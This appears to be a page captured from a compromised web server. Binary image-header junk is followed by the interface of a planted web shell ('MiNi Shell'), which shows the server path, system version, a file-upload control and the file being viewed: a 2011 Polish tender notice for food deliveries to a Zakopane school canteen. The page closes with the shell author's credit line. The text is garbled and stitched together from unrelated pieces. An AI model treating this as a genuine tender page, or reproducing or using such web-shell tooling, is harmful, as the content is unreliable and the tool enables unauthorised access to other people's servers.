JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111128/400078-N-2011.html

<p class="kh_header"><b>Zakopane: Dostawy artykułów spożywczych na potrzeby stołówki internatu Zakopianskiego Centrum Edukacji</b><br>
<b>Numer ogłoszenia: 400078 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakopiańskie Centrum Edukacji im. H. Modrzejewskiej , ul. Kasprusie 35A, 34-500 Zakopane, woj. małopolskie, tel. 018 2012786, faks 018 2012786.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych na potrzeby stołówki internatu Zakopianskiego Centrum Edukacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych na potrzeby stołówki internatu Zakopiańskiego Centrum Edukacji, zgodnie z warunkami wynikającymi z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. nr 171, poz.1225).
2. Szczegółowy opis przedmiotu zamówienia określony jest w załączniku nr 2 do niniejszej specyfikacji i jest podzielony na 5 pakietów tj.
 I   -Mięso i wędliny; 
II   - Artykuły nabiałowe; 
III  - Artykuły sypkie, przyprawy i przetwory; 
IV  - Owoce, warzywa, mrożonki, ryby i jajka;
 V  - Pieczywo..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7, 01.10.00.00-8, 01.24.00.00-1, 01.13.00.00-7, 15.11.00.00-2, 15.13.11.30-5, 15.22.20.00-0, 15.33.31.00-7, 15.33.22.00-6, 15.41.10.00-2, 15.50.00.00-3, 15.61.00.00-7, 15.81.00.00-9, 15.84.00.00-8, 15.87.11.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie . Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie . Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie . Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie . Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie . Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmian zawartej umowy w przypadku jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany są korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakopiańskie Centrum Edukacji ul. Małe  Żywczańskie 9 b    34-500 Zakopane
tel.0-18/20127 82.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2011 godzina 12:00, miejsce: Zakopiańskie Centrum Edukacji ul. Kasprusie 35 a 34-500 Zakopane pokój 107..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kości karkowe	30	kg					
2.	 Mięso gulasz cielęcy	20	kg					
3.	Mięso schab wieprzowy b/kości	300	kg					
4.	Mięso pieczeń cielęca	30	kg					
5.	Mięso łopatka wieprzowa	400	kg					
6.	Słonina	15	kg					
7.	Porcje rosołowe	350	kg					
8.	Filet z kurczaka	350	kg					
9.	Filet z indyka	300	kg					
10.	Udko z kurczaka	250	kg					
11.	Filet pieczony z indyka	15	kg					
12.	Golonka prasowana	10	kg					
13.	Kiełbasa krakowska parzona	15	kg					
14.	Kiełbasa zwyczajna	50	kg					
15.	Kiełbasa krakowska sucha	50	kg					
16.	Kiełbasa szynkowa	30	kg					
17.	Kiełbasa toruńska	70	kg					




18.Kiełbasa wiejska	10	kg					
19.	Parówka śląska	100	kg					
20.	Pasztet drobiowy 50 g	1000	szt.					
21.	Polędwica z indyka	50	kg					
22.	Polędwica sopocka	50	kg					
23.	Kiełbasa lisiecka	10	kg					
24.	Podgardle wędzone	50	kg					
25.	Pasztet krojony	30	kg					
26. 	Pasztetowa kremowa	15	kg					
27.	Szynka gotowana	30	kg					
28.	Indyk w galarecie z warzywami	25	kg					
29.	Szynka łopatkowa	15	kg					
30.	Szynka staropolska	20	kg					
31.	Szynka wieprzowa	10	kg					
32.	Szynka delikatesowa	10	kg					
33.	Frankfuterki	30	kg					
34.	Szynka konserwowa	15	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7, 01.10.00.00-8, 01.24.00.00-1, 01.13.00.00-7, 15.11.00.00-2, 15.13.11.30-5, 15.22.20.00-0, 15.33.10.00-7, 15.33.22.00-6, 15.41.10.00-2, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Dostawa artykułów nabiałowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jogurt owocowy 125 ml	500	szt.					
2.	Kefir 400 ml	300	szt.					
3.	Margaryna mleczna 250 g	80	szt.					
4.	Mleko karton 1l    3,2 %	1000	szt.					
5.	Śmietana 18% 400 g	600	szt.					
6.	Masło 200 g	800	szt.					
7.	Serek ( typu tartare) 20 g	2000	szt.					
8.	Serek( typu twój smak) 125 g	400	szt.					
9.	Serek( typu kiri) 100 g	40	szt.					
10.	Serek homogenizowany (typu danio) 140 g	500	szt.					
11.	Ser topiony plastry 130 g	50	szt.					
12.	Serek ( typu wiejski) 150 g	200	szt.					
13.	Ser biały półtłusty	200	kg					
14.	Ser topiony kostka 100 g	50	szt.					
15.	Serek( typu kanapkowy) 150 g	100	szt.					
16.	Serek (typu kremowy smak) 125 g	300	szt.					
17.	Serek (typu fromage) 100 g	200 	szt.					
18.	Ser topiony krążki 150 g	200	szt.					
19.	Ser żółty salami	100	kg					
20.	Ser żółty edamski	50	kg					
								
                                                                                                                                    
21.	Ser żółty gouda	50	kg					
22.	Ser żółty(typ dziurawiec)	50	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 03 <b>NAZWA:</b> Dostawa artykułów sypkich, przypraw i przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ananas w syropie  565 g	20	szt.					
2.	Bazylia 10 g	10	szt.					
3.	Barszcz czerwony -koncentrat 250 ml 	30	szt.					
4.	Chrzan tarty(typu Polonaise)180 g	30	szt.					
5.	Cukier kryształ	800	kg					
6.	Cukier puder	20	kg					
7.	Cukier waniliowy 30 g	40	szt.					
8.	Cynamon 20 g	20	szt.					
9.	Czosnek granulowany 1000 g	15	szt.					
10.	Dżem porcjowany 25 g mix(typu Tymbark)	6000	szt.					
11.	Dżem wiadro - truskawka  7,2 kg	5	szt.					
12.	Galaretka owocowa 79 g	300	szt.					
13.	Groszek konserw.(typu Pudliszki) 400 g	30	szt.					
14.	Grzyby- pieczarki marynowane 0,8 l	20	szt.					
15.	Herbata indyjska 80 g	150	szt.					
16.	Herbata ekspresowa(typu Golden assam) 100 szt.	50	szt.					
17.	Jabłko prażone 0,9 l 	40	szt.					
18.	Kukurydza konserwowa (typuPudliszki) 400 g	50	szt.					
19.	Kasza jęczmienna mazurska 	30	kg					
20.	Kakao (typu Decco moreno) 200 g	5	szt.					
21.	Kawa  naturalna rozpuszczalna(typu Nescaffe clasic) 200g	50	szt.					
22	Kwasek cytrynowy 20 g	100	szt.					
23.	Ketchup łagodny (typu Roleski) 450 g	50	szt.					
24.	Przyprawa do potraw (typu Kucharek) 1kg	100	szt.					
25.	Kminek 30 g	20	szt.					

26.	Koper suszony 20 g	10	szt.					
27.	Koper solony 180 g	20	szt.					
28.	Liść laurowy 125 g	10	szt.					
29.	Mąka ziemniaczana	40	kg					
30.	Mąka pszenna  poznańska	500	kg					
31.	Makaron łazanki (typu Lubella)	50	kg					
32.	Makaron gwiazdki(typu Lubella)	25	kg					
33.	Makaron muszelki małe (typu Lubella)	25	kg					
34.	Makaron spaghetti(typu Lubella)	50	kg					
35.	Makaron kolanka(typu Lubella)	25	kg					
36.	Makaron nitki(typu Czarniecki) 	100	kg					
37.	Makaron zacierka 250 g	150	szt.					
38.	Musztarda(typu Roleski) 450 g	50	szt.					
39.	Majonez(typu Roleski) 0,9 l	80	szt.					
40.	Majeranek 15 g	35	szt.					
41.	Maggi - przyprawa do potraw(typu Winiary) 1 l	80	szt.					
42.	Miód naturalny 15 g	500	szt.					
43.	Oregano 10 g	10	szt.					
44.	Ogórki konserwowe (typu Roleski)0,9 l	120	szt.					
45.	Olej uniwersalny 5 l	150	szt.					
46.	Ocet winny 225 ml	25	szt.					
47.	Przecier pomidorowy 30% (typu Pudliszki) 0,2 l	100	szt.					
48.	Przecier pomidorowy(typy Złoty bażant) 400 g	100	szt.					
49.	Papryka konserwowa( typu Roleski) 0,9 l	20	szt.					
50.	Płatki zbożowe(typu Choco cool) 1000 g	30	szt.					
51.	Płatki kukurydziane (typu Nestle) 1000 g	50	szt.					
52.	Proszek do pieczenia 30 g	10	szt.					

53.	Ryż biały (typu Sonko)	200	kg					
54.	Sól	150	kg					
55.	Napój owocowy(typu Tymbark) 0,2 l	60	szt.					
56.	Sos  ogrodowy, sałatkowy (typu Knorr) 700 g	20	szt.					
57.	Sos bolognase(typu Knorr) 1000 g	7	szt.					
58.	Susz warzywny 100 g	50	szt.					
59.	Wafelki w czekoladzie (typuGrześki) 36 g	500	szt.					
60.	Wafelki w czekoladzie (typu Prince polo) 20 g	1000	szt.					
61.	Pieprz naturalny czarny 500 g	15	szt.					
62.	Ziele angielskie 400 g	10	szt.					
63.	Żurek (typu Śląski) 0,5 l	70	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 04 <b>NAZWA:</b> Dostawa owoców, warzyw,mrożonek, ryb i jajek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Brzoskwinie	100	kg			
2.	Banany	600	kg			
3.	Botwina	20	szt.			
4.	Buraki czerwone	300	kg			
5.	Cebula	200	kg			
6.	Cytryny	100	kg			
7.	Fasola Jaś średni	35	kg			
8.	Fasola szparagowa	30	kg			
9.	Fasola szparagowa mrożona	60	kg			
10.	Groch łuszczony	20	kg			
11.	Grzyby pieczarki	60	kg			
12.	Jabłka	300	kg			
13.	Jaja	4000	szt.			
14.	Kapusta biała	300	kg			
15.	Kapusta czerwona	50	kg			
16.	Kapusta włoska	100	szt.			
17.	Kapusta pekińska	200	szt.			
18.	Kapusta kiszona	100	kg			
19.	Kalafior	50	szt.			
20.	Kalafior mrożony	60	kg			
21.	Koper zielony	300	szt.			
22.	Marchew korzeniowa	600	kg			
23.	Mandarynki	100	kg			
24.	Mieszanka warzywna (bukiet z warzyw) mrożona	150	kg			
25.	Marchew z groszkiem mrożona	40	kg			
26.	Mieszanka kompotowa mrożona	450	kg			
27.	Ogórki zielone	300	kg			
28.	Ogórki kiszone	150	kg			
29.	Pomidory	300	kg			
30.	Pory	40	szt.			
31.	Papryka czerwona	50	kg			
32.	Pietruszka zielona	350	szt.			
33.	Pietruszka korzeń	40	kg			
34.	Rzodkiewka	50	szt.			
35.	Ryba - filet mrożony z mintaja ( płaty)	250	kg			

36.	Szprot w oleju 170 g	10	szt.			
37.	Seler korzeniowy	30	kg			
38.	Sałata zielona	500	szt.			
39.	Szczypiorek	100	szt.			
40.	Ziemniaki	4500	kg			
41.	Truskawki mrożone	70	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.12.10.00-1, 01.13.00.00-7, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 05 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bułka kajzerka  30 g	1000	szt.
2.	Bułka kajzerka 60 g	6000	szt.
3.	Bułka tarta	200	kg
4.	Chleb pszenno-żytni - krojony 700 g	2000	szt.
5.	Chleb graham  - krojony 500 g	100	szt.
6. 	Drożdżówki	150	szt.
7.	Pączki	300	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com